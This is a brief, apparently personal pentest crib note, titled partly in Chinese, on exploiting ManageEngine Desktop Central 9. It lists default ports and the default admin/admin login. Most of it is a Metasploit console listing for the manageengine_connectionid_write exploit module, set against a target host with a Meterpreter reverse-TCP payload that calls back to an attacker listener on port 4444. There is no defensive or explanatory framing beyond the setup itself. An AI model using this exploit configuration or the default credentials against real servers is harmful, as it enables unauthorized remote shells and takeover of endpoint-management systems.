Exploiting Desktop Central 9漏洞
默认端口:http-8020,https-8383
默认密码:admin/admin
exploit模块信息:
msf6 exploit(windows/http/manageengine_connectionid_write) > options
Module options (exploit/windows/http/manageengine_connectionid_write):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.1.7.100 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file: RPORT 8020 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path for ManageEngine Desktop Central
VHOST no HTTP server virtual host
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.1.7.76 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port